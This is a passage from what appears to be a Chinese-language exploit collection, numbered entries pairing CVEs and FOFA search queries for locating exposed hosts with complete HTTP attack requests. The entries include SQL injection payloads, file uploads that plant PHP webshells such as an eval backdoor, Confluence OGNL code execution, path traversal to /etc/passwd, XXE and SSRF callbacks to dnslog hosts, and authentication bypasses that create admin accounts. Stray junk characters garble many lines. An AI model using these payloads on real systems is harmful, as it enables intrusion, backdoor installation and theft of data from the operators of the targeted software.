% C) w9 p+ Q: T( P' E% USec-Fetch-Mode: cors
6 {2 g/ {; K$ R6 j# PSec-Fetch-Site: same-origin6 R" F, b* u. O6 W9 L/ o. ]6 r
X-Forwarded-For: 1.1.1.1
. `( |" q, k9 n" VX-Originating-Ip: 1.1.1.1: q+ W/ m A* g% Z; ~; W3 v
X-Remote-Ip: 1.1.1.1
: I& M- [4 r" L7 r1 }X-Remote-Addr: 1.1.1.13 C& T8 D; k- {
Te: trailers) g& q& J/ y6 O* K2 |+ O
Connection: close
7 D$ a8 R, |8 j7 I" R
, n# _7 c4 l6 c" U% Jsrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456$ W5 A8 f& n4 Q0 a* H& [
1 J7 x$ p8 }0 n! r7 j, K, @1 g8 L# `, f$ p. n
120. 北京百绰智能S40管理平台导入web.php任意文件上传
9 C" V9 h. E$ f, vCVE-2024-12531 a& X+ R) l9 ~' `4 O7 p
FOFA:title="Smart管理平台"! Q4 B9 H- |& _8 M, @6 C# g; r
POST /useratte/web.php? HTTP/1.1
+ J1 ?) [- s% G) |( z# R( W0 qHost: ip:port% Z. a/ X/ I& Y$ t7 }+ @7 l
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
% m7 x1 a. {9 c/ BUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
# X5 F3 ]. Q9 LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 K2 O( E, G; H# K9 ~- H# x% F5 d8 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 ~/ [7 ?8 D! nAccept-Encoding: gzip, deflate
& o) T2 f! p) M( V6 }+ ~Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( J4 S. A% \ S0 L. k! `
Content-Length: 597& m- c: j3 D& C% ^; R+ F3 G2 f
Origin: https://ip:port
. z" X4 N8 _. r, ~, T( jReferer: https://ip:port/sysmanage/licence.php6 W# j* v Y& W
Upgrade-Insecure-Requests: 1
& P# M/ \0 w+ j( G4 X$ n# ]1 C5 bSec-Fetch-Dest: document
' J& S% n2 n- m% \8 L! FSec-Fetch-Mode: navigate
; K9 J" I( E. ySec-Fetch-Site: same-origin
5 _% d% N& ]0 _Sec-Fetch-User: ?1# E7 U8 h7 t! t6 |- k
Te: trailers
- B! A; d2 A: k! }( HConnection: close* z) V* |; ] z# [; u
" R4 V) | T2 U1 T) k+ W: S6 D-----------------------------42328904123665875270630079328+ {6 B' ?' _8 Y* J% I7 O) x8 Y# B
Content-Disposition: form-data; name="file_upload"; filename="2.php"" y) H% k2 S" c
Content-Type: application/octet-stream
9 _. p' a6 U* L w8 K% h) d
! p7 _( @# V% ^5 y" x7 ~# K<?php phpinfo()?>! T4 I, A1 M8 k6 u0 t4 ?9 |! ]
-----------------------------423289041236658752706300793283 T' _4 h0 f/ j* Z% I+ C
Content-Disposition: form-data; name="id_type" x2 c8 `6 D" _; R
1 c# ^* a/ @" Q& `; a8 j: d1, n2 U6 u6 h! ^( K8 J1 g
-----------------------------42328904123665875270630079328 _ `9 \7 x7 B: d2 f$ J' }
Content-Disposition: form-data; name="1_ck"
# X; ~' K$ F, n; f% b3 i
: q' W3 U- p# z9 ~: ^* g5 R2 B1_radhttp- ]+ e9 ^& z$ h( l/ l
-----------------------------423289041236658752706300793288 [* ^3 B; p& A0 n/ O. B4 N
Content-Disposition: form-data; name="mode"
# K) l; I! j( D: a# U$ E
: k; Z9 Y/ l. K) Cimport4 i* Q& s9 ^5 s* B1 ~; c- Z
-----------------------------42328904123665875270630079328
5 m" T' E, U7 X' N b- @( C+ d7 g* N8 g6 z0 z# \
# L3 g5 Y( a2 J0 ]) C文件路径/upload/2.php/ `) |% U. r6 U
0 s: ?" |* r3 P
121. 北京百绰智能S42管理平台userattestation.php任意文件上传; y! V; I8 {0 }
CVE-2024-1918
9 R- s) d6 y! _$ _+ f' rFOFA:title="Smart管理平台"9 e& t* V- N$ F; ^2 H) m: J
POST /useratte/userattestation.php HTTP/1.1
( ]; _$ |: A9 T, e" W7 O7 fHost: 192.168.40.130:8443& @1 e o M6 ?
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50) i s( A5 {! k* O) d0 p
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
3 Q" G, b+ V2 i0 \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ G3 L# ` I. NAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 J/ O7 R- e7 x- Y6 S# x, OAccept-Encoding: gzip, deflate
[0 k1 {) M8 p2 t, RContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
6 f6 V# O5 o. ?% c5 RContent-Length: 592
1 V+ W( f5 P+ Z; \" A- zOrigin: https://192.168.40.130:8443: O$ p+ }, p# F$ J0 U8 V2 ?
Upgrade-Insecure-Requests: 1* H M" I* W. D1 \2 f% v- p
Sec-Fetch-Dest: document
6 E! {2 D* Y7 f# b) I+ F$ z" jSec-Fetch-Mode: navigate
8 h- |8 H- M5 g& fSec-Fetch-Site: same-origin8 s+ Q7 e* Z4 i! ~3 ?
Sec-Fetch-User: ?1
+ W2 G6 x8 D5 C W, @% gTe: trailers
. O( B( ^( Z- T1 o8 Q2 sConnection: close2 z- ~6 X# T4 [ }! t1 @
: k/ e- _' Q8 S# X1 b
-----------------------------42328904123665875270630079328
9 U# p. [8 \% g, I6 |Content-Disposition: form-data; name="web_img"; filename="1.php"1 | b# ]- }9 J
Content-Type: application/octet-stream I2 @+ s B2 x4 ^0 r# b8 N+ M
+ c* e/ j4 [7 ^ p* A<?php phpinfo();?>
$ D* x3 a% c" X J-----------------------------42328904123665875270630079328
7 d' v/ M' O8 W7 `3 ?0 QContent-Disposition: form-data; name="id_type"
$ P2 d) C0 i! J' T: L/ e
4 R1 h& x* o/ K! V( G" `16 t# ?! F! G& I; j4 W; B
-----------------------------423289041236658752706300793283 N! O* N* }6 \9 V# f& n3 h. \; ?
Content-Disposition: form-data; name="1_ck", Y9 {( S8 y5 x/ C
- ]1 E" P$ H7 J0 {5 m: r1_radhttp' f5 B& T& B- w* p4 ~& F- o
-----------------------------42328904123665875270630079328; Z1 U" ?3 M, U4 B2 W
Content-Disposition: form-data; name="hidwel"
6 n$ E& m, ~6 k( Z: Q& {
* J* X/ K3 @# [, e( o# Gset' v3 s% \* Z7 c; Y1 u( b, i
-----------------------------423289041236658752706300793280 M# c$ C2 a2 ~# ] O
" ?0 Z4 ]" v1 X
0 [) N. n( W3 a$ y; B
boot/web/upload/weblogo/1.php5 d: |8 {5 j5 Y) ?. W4 K2 R: @
: i4 X Z5 m. U3 s8 d
122. 北京百绰智能s200管理平台/importexport.php sql注入
0 j, } ^! V7 R% Z$ V$ O KCVE-2024-27718FOFA:title="Smart管理平台", N# A, U$ J6 F2 v: @0 x3 z, E
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()+ \% W; x/ z7 R3 b0 \) P
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1& i9 |8 u6 u# I7 N3 y
Host: x.x.x.x
9 ?- N. g, M' p4 Q0 B: {Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
% Y. a6 m( q; `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
* F) _2 ]( w' S: M5 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- g& n2 {) x2 z7 ` T( | ]$ L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 v8 e2 M# t! Y& a; F( H; tAccept-Encoding: gzip, deflate, br
t* W: S( X, \/ h9 eUpgrade-Insecure-Requests: 1" k4 Y/ Q& ~9 i }& O; x, G
Sec-Fetch-Dest: document" h4 y e3 d& D7 a! h
Sec-Fetch-Mode: navigate; X+ o/ w! K- O! f9 V
Sec-Fetch-Site: none X* C2 {. O: j* p _
Sec-Fetch-User: ?1
5 O4 H& o* J" {0 cTe: trailers
# P, c/ i9 w! M; v D' h$ J5 JConnection: close
9 c. f" O2 Q0 F" `0 r' x
: ~3 T+ y6 F9 x! k( Z) Y9 \) \) @1 f; H: a' ^' t P
123. Atlassian Confluence 模板注入代码执行 B' f' S! i; f
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"9 D3 W, H5 [ s' P2 u
POST /template/aui/text-inline.vm HTTP/1.1
3 U. v0 ]( n5 r X, `8 _ L# @ DHost: localhost:8090
5 S, E( M, {4 C! k. y7 J# |Accept-Encoding: gzip, deflate, br
7 B' w4 o* n F( IAccept: */*. v" r4 o( q" P1 t$ k% T/ c
Accept-Language: en-US;q=0.9,en;q=0.8
: |2 l7 D" I) }! A' m6 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.367 R! w8 [# n: E4 o0 V$ [. Z9 ~4 j9 d
Connection: close
1 w+ `' u' [1 I: i" A) PContent-Type: application/x-www-form-urlencoded0 R1 U! r' a# B, H( A W* \: ?: V
1 e5 H% L: ?. O% d& L
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))8 s4 v! u3 r5 r7 A
4 S2 Y/ b3 s6 x9 K8 T
4 a! z7 V( z0 k3 w4 s& k124. 湖南建研工程质量检测系统任意文件上传
9 E0 L0 |, ]; Y' J8 o3 H4 KFOFA:body="/Content/Theme/Standard/webSite/login.css"
! w, ] q4 g- A$ g- p9 |4 ?% _POST /Scripts/admintool?type=updatefile HTTP/1.18 I+ @6 v& v- l
Host: 192.168.40.130:8282
7 g# G4 u0 Q3 U; z& bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.362 M1 [3 {% `* P5 n0 X
Content-Length: 72
: W4 Y" e2 o0 |! GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
2 g* F4 w& T7 o' e! aAccept-Encoding: gzip, deflate, br. V5 @: f) T! l' ?4 T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
& j' a( R% d7 z' i+ O4 }Connection: close2 G# ^5 t! u5 B( E: _. X0 H8 f9 A
Content-Type: application/x-www-form-urlencoded, f) ] S: K- k0 P: D; |1 s# r- h& q
2 q% h) {: ]5 Q% g" ?filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%># G, B: O9 o7 @7 F2 s8 K
5 ?% @" z5 a* \5 l1 a- m2 h( l: d/ I; M0 p7 @/ p. X0 ?2 I" s
http://192.168.40.130:8282/Scripts/abcgcg.aspx+ } n8 D2 J9 l( C0 M5 N% h1 ^0 E2 ?: ?
7 P f4 H( H& F$ c# a125. ConnectWise ScreenConnect身份验证绕过: V" |1 c, N+ C% l
CVE-2024-1709; D, V/ N0 f3 ^' H+ M" W- v
FOFA:icon_hash="-82958153"$ |; F: O2 ?' t' y1 o
https://github.com/watchtowrlabs ... bypass-add-user-poc
1 j! p- c3 [ z8 c4 R6 K; N5 B* A* @. P" g) c
: j+ w7 X9 ~0 {0 u使用方法 K6 J0 u- a" ~
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!& e, |1 i9 Q1 {+ }5 {, M9 i" Y
9 r E# u9 _6 M3 x+ z% q! _! b
& @7 Y) D( w# r) e/ n0 E7 x9 V创建好用户后直接登录后台,可以执行系统命令。
2 A- u W& Z g+ ^$ A) @
1 v/ L ]6 e& S5 s- x126. Aiohttp 路径遍历
1 D$ ~4 c! o' R: F5 c& o. GFOFA:title=="ComfyUI"
B5 j8 D/ V3 A2 u2 w" E% u6 wGET /static/../../../../../etc/passwd HTTP/1.1# x+ U( a4 i: H1 r& d Q' D
Host: x.x.x.x
$ \3 p. k7 D2 {( }# J' oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36) n3 H/ \* {: Y. F7 C
Connection: close
7 _! v" H+ Z" LAccept: */*
# y# Z3 P. U9 A* ?! Z! g. [5 CAccept-Language: en. ~: g, j4 |. s' i& r
Accept-Encoding: gzip
( C! Y7 g8 W. ?+ h1 d& ~- S6 \* p/ h/ a% H
2 c8 U* S$ Y3 `1 j: F* N& a4 E" W127. 广联达Linkworks DataExchange.ashx XXE
) R( X5 z* o! b+ w6 f* m" ~FOFA:body="Services/Identification/login.ashx" ( I" {- J/ ^5 y4 i! n
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1/ O8 v: R3 @8 l
Host: 192.168.40.130:88881 R5 X! X& h7 V/ {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36, s7 f+ C1 K# w# }1 }
Content-Length: 415 w6 {1 S; w0 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 x+ Z4 j: }: e7 J& w% T6 F
Accept-Encoding: gzip, deflate
9 l L6 k3 p6 y% LAccept-Language: zh-CN,zh;q=0.9
% W( u# d! c3 e2 ~& y0 |9 eConnection: close2 }' n, ^9 @7 L' M$ ^9 y
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
& V# ^8 c6 @7 U4 l; e6 HPurpose: prefetch
0 x9 C- ^2 V/ W: bSec-Purpose: prefetch;prerender5 i# U. p( |6 H; z
2 @8 i- C2 e4 |2 F- Y$ E
------WebKitFormBoundaryJGgV5l5ta05yAIe0/ N) I. `0 Z# n: h
Content-Disposition: form-data;name="SystemName"
1 H# @/ ?1 X7 a3 k& j6 k0 q& u, \8 H* y5 a0 j$ C( Z1 g$ K
BIM s1 o+ R' H; _2 b. s
------WebKitFormBoundaryJGgV5l5ta05yAIe0
& `; N9 J y2 ` R% X$ G4 W' ~2 pContent-Disposition: form-data;name="Params"
) @2 P# w8 i4 M1 p, l9 CContent-Type: text/plain
D" _' b1 w( Q( y' V! {4 t2 I7 B. i" N0 K5 k
<?xml version="1.0" encoding="UTF-8"?>
" a0 X# T! g" X) D9 H/ v5 i<!DOCTYPE test [4 b. j" d: w5 U* [1 r
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
3 h2 C; k5 O7 L, q3 K/ g" t] i2 v, ^7 u8 W9 T4 s" m' Z
>
9 W$ a5 s& W" Q5 ^<test>&t;</test>! s2 D( j$ P5 R# F, R* y
------WebKitFormBoundaryJGgV5l5ta05yAIe0--
% N( u% d% p5 Z, R' h6 _- {& F9 E( }4 o/ }
$ u4 g& W) t x$ V$ O* t: J3 E4 b3 k% c0 w
128. Adobe ColdFusion 反序列化
6 \+ L* U. W6 f& l& ~% DCVE-2023-38203
- c% o3 Q' `/ pAdobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
8 z& { c& Y |4 Y+ hFOFA:app="Adobe-ColdFusion"8 j3 f6 m, R( w$ W/ H# H* g
PAYLOAD
$ S2 p& _6 z( w
. A" g) c" m2 c6 o0 y129. Adobe ColdFusion 任意文件读取7 I; `$ L% ?+ O" C# Q) D+ x
CVE-2024-20767
! ~3 s. H* ^8 k- A$ DFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
0 @0 X- E' z2 a, q7 y第一步,获取uuid8 t/ K" U1 J. { F0 ]2 X
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1. ?. @% p1 a/ \0 J$ h* D, B8 ^/ x( c- P: w
Host: x.x.x.x U" \' ^) h* `$ f: v7 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
) U' L: ` _* p, x& K& tAccept: */*
- k% T! X& U8 ~& \& D* S; RAccept-Encoding: gzip, deflate0 [+ ~, ?* h3 M7 R
Connection: close
) J' T3 W+ u: B' x/ T3 k6 U- K3 b. [; x
9 T) X3 I" Y' Z! i, O第二步,读取/etc/passwd文件9 k h2 s- T& p o
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1+ g9 W ^$ P/ V7 {8 Z
Host: x.x.x.x
, A6 m: L, S2 i) TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
1 Q: p; ]) W& lAccept: */*5 J/ `0 T6 _7 Y" Z
Accept-Encoding: gzip, deflate
* v3 [% B4 P) i' I0 O+ XConnection: close
( x7 O* h+ }1 Uuuid: 85f60018-a654-4410-a783-f81cbd5000b90 I0 l0 y R4 Z' i8 Y$ ?+ @0 ], J
. T. C/ L) C5 V& [' B6 |& [
5 Z5 |( t8 J: X- y, S/ H3 I# h
130. Laykefu客服系统任意文件上传( m; b+ _& t4 a( }) M
FOFA:icon_hash="-334624619". M" l0 E; T2 O9 I. ~9 K8 g+ `- X
POST /admin/users/upavatar.html HTTP/1.1
8 p/ s+ b" H+ d* h7 aHost: 127.0.0.19 m. [# C0 g2 a- A8 z. U/ e
Accept: application/json, text/javascript, */*; q=0.01
3 d2 [. ^# x# \6 AX-Requested-With: XMLHttpRequest
$ l" \4 [6 e% d* U. H: E! S. RUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
& N# N9 d- |; m# Y8 gContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR Z% H) ^: n* b. N5 g7 S
Accept-Encoding: gzip, deflate x: x- w% W# ^$ x) Q
Accept-Language: zh-CN,zh;q=0.93 W- Z+ O& @7 ~: F) o
Cookie: user_name=1; user_id=37 s- T+ j2 p5 {2 t5 S- m8 W7 C4 O
Connection: close1 p/ E5 A; D& G# O( A9 j
d: \$ p5 _) T5 S9 j------WebKitFormBoundary3OCVBiwBVsNuB2kR
$ D% C7 w1 l( X1 i% }Content-Disposition: form-data; name="file"; filename="1.php"1 [( t) U( J7 @2 E% e
Content-Type: image/png
5 S; x. t( D; P& @' F5 @. R, s
; O+ \9 T1 U. q: X$ } s<?php phpinfo();@eval($_POST['sec']);?>
6 y9 O# I$ K6 ^9 L# f------WebKitFormBoundary3OCVBiwBVsNuB2kR--
! l% z8 m' t( v# ~# ]
! b( i. ~5 I! s( B: _' N
! U1 b9 l, B1 s) _; C131. Mini-Tmall <=20231017 SQL注入
4 e2 D3 Y1 o# {: w9 n6 jFOFA:icon_hash="-2087517259"/ d$ v1 e8 |, V& k
后台地址:http://localhost:8080/tmall/admin
6 H" d: C- E2 c+ zhttp://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)! b3 R" B/ w/ ~) `, Z, H+ c
* S8 U: N! k: b7 q% R4 G132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过; r i0 I1 z# y0 M/ _7 g
CVE-2024-27198
4 g E* q0 u" kFOFA:body="Log in to TeamCity"
! E' R% b- `' j: `9 F: \POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.13 ~2 k* C6 D6 t+ ?) _' u
Host: 192.168.40.130:81115 @8 T; J' n* o" o' y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% c G9 X4 b) z( J/ z# V& j
Accept: */*' N$ V/ N0 j. n
Content-Type: application/json3 `: g( R, O6 M# [6 I% x. {: e
Accept-Encoding: gzip, deflate
( L2 s2 P; f* ^- ?7 e- _5 x% g
" K+ U6 ?7 E* h+ r! _4 Q- M{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}( B3 f) j) N C/ ~5 Z7 \+ ^: w
) S8 E/ n1 F8 \. o7 {! g$ ?
0 ?* R# X5 |2 M2 A: |CVE-2024-27199
. Z* D" ^( a, k/res/../admin/diagnostic.jsp
" O* ~( S3 g, T" z& @# m& u/.well-known/acme-challenge/../../admin/diagnostic.jsp2 _' V' ]5 n: ?$ {
/update/../admin/diagnostic.jsp/ d: m+ {6 A: n6 K( z- B
" o5 D5 Q) Y, i4 ^- a' t; H% R3 N' j( s) Z+ z) c% r
CVE-2024-27198-RCE.py# l5 c% ~5 `/ I& E
4 i6 S4 a0 g/ Q. T" \133. H5 云商城 file.php 文件上传
- P5 j) e3 r3 WFOFA:body="/public/qbsp.php". Y% W. r' S- \0 H% K; }& K
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
' _; \2 p, }6 e/ jHost: your-ip. T N% a& A9 C5 b
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 ]6 w. ?" p# j" z( A! W) H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx- j/ Z3 I+ I; X6 w
# Q. M3 ~* m9 L B------WebKitFormBoundaryFQqYtrIWb8iBxUCx7 W0 \/ I" D! o0 K2 Q* P
Content-Disposition: form-data; name="file"; filename="rce.php"8 i- c4 B/ D; C. r; Y1 Z* W
Content-Type: application/octet-stream1 x# A/ p4 o0 g' o
5 }4 o8 d% O7 r, R
<?php system("cat /etc/passwd");unlink(__FILE__);?>
5 i! F: }6 @/ X( Z- X$ q3 p$ k3 c6 N6 Q------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
( P" [) K/ H; A+ {( C- b c) U- M# |3 E' c! v1 e
|7 l$ U! T; {" F9 A) t
& N/ i- U8 F' \% E" N1 O9 ^
134. 网康NS-ASG应用安全网关index.php sql注入
* q: e6 \: ^1 vCVE-2024-23304 W- o+ Y/ l) k
Netentsec NS-ASG Application Security Gateway 6.3版本
8 P, _) Y) Q% H! W/ j9 uFOFA:app="网康科技-NS-ASG安全网关"
0 o' i( e# O1 Y5 R8 RPOST /protocol/index.php HTTP/1.1# Q) d9 R( }2 c# ?2 |5 s; ~$ s" G+ R
Host: x.x.x.x
% D! S4 h: [5 x2 K. rCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de( S5 W1 C' B2 ^2 t
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
7 [* e# f5 [7 L* b7 E- FAccept: */*
" k1 ~, i, Q+ f& ~Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 P* O% q( m5 _7 ?3 J
Accept-Encoding: gzip, deflate! D9 C9 O; G, R, i8 B" A
Sec-Fetch-Dest: empty) u0 F( O4 R% g
Sec-Fetch-Mode: cors J4 D$ s( ?- [; [8 |4 n
Sec-Fetch-Site: same-origin
8 j1 `& S1 P8 l/ PTe: trailers9 k2 R' W4 x5 Y2 {( y& Z3 }- C
Connection: close8 J! M- k; B% d0 n; t7 R# F
Content-Type: application/x-www-form-urlencoded
" P. B* C9 ] ^8 W3 ~: eContent-Length: 2636 Z* @5 N. G* n" a5 _& D: f
/ L$ }7 k8 L& `1 h
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}8 _) y! H+ f( P5 l9 u% S
. |: X- I* R9 }2 P6 D/ Q+ j
G& I6 d+ C* T M1 `( m
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; s0 {$ A8 W; l ZCVE-2024-2022; Y0 i2 f! y2 O) ^% |* {
Netentsec NS-ASG Application Security Gateway 6.3版本
9 t7 w0 s8 g$ A3 KFOFA:app="网康科技-NS-ASG安全网关"3 T8 _/ B/ Z( B9 |2 B: h
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1* f3 Q, C# k/ ^ A
Host: x.x.x.x9 H# N* q5 ]$ `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
6 f3 j l9 d+ Z- s* V4 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# M; }' G0 {5 n. p/ ] \4 t2 M
Accept-Encoding: gzip, deflate3 V* R' n3 `' k& g1 ~4 r, N
Accept-Language: zh-CN,zh;q=0.9
3 @9 n6 X* n/ u, {9 sConnection: close: W! v, { m3 f, n/ n5 Q6 \, h5 C
( k3 K$ _2 h4 k6 d/ z
" M7 T) l6 x: r* H) w2 z. |; p. ^- X2 w136. NextChat cors SSRF
: c; S: T% j* ?3 t+ t( V, ~CVE-2023-49785
. ?" A4 z. p9 T6 ?FOFA:title="NextChat"5 W p% P( f$ p( C9 {. A
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
- J! b- Z; z- M% L! s N2 cHost: x.x.x.x:10000; ~+ {% y B' r
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 q; `: x* o) a0 f8 {9 eConnection: close
) Y5 f" V% s" ]& H! SAccept: */*/ S' E# q8 F6 m/ P) w) d& k. E
Accept-Language: en
1 ^" A: \, R, W6 ^Accept-Encoding: gzip0 I7 }/ V0 V9 @. p' c8 u
2 q0 m8 {9 u8 P) i5 ^) a, L/ G* `
C! S! A; U, z, D5 \/ G7 H' N137. 福建科立迅通信指挥调度平台down_file.php sql注入6 T' r# a( M: g* R# ]2 j6 K
CVE-2024-2620* z- Z7 K9 `) T0 q
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
4 u! L* Q0 @ W) }+ v' C7 T4 Y' O+ iGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1# ?$ }# y$ `2 T4 C- m
Host: x.x.x.x \7 {# x3 {2 C" {, H6 N% Q/ Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 ~- s! c0 F% M. l+ H# \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' x/ G M2 o& J1 \$ \3 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; ?: W2 H: u4 O# d' T: w. YAccept-Encoding: gzip, deflate, br( w8 R8 N% P& M% Y6 D& U/ C
Connection: close k6 s/ f9 [& q
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj3 L. x% F# m9 w# d% U8 ^
Upgrade-Insecure-Requests: 1
6 v4 {( ?+ B# o \- @
1 Z2 W1 @, x0 {( {+ e8 e9 t0 Y) S% k# ]4 w
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
5 L, v" W) h, }, HCVE-2024-2621
. L% X" t5 O/ i$ N0 r, \- FFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& o' R; _+ J# W+ A1 D# nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
2 q0 p( g4 Q3 G' g% ~9 DHost: x.x.x.x
0 B! C" G9 D! Z* }. tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.09 v; A; Q6 Y5 L/ u- M0 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8: i. ]# q8 A+ o( ~4 K" X0 w' ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, D: @4 j1 ?* j. i0 Z5 f. u
Accept-Encoding: gzip, deflate, br( Z( {, n3 e# G& {+ |6 H0 e' O
Connection: close: B! R& g. E. l+ M1 [: U$ {3 Y# k, b
Upgrade-Insecure-Requests: 1
0 |8 F2 e# M3 P8 G; F& `4 ]+ {* R8 L
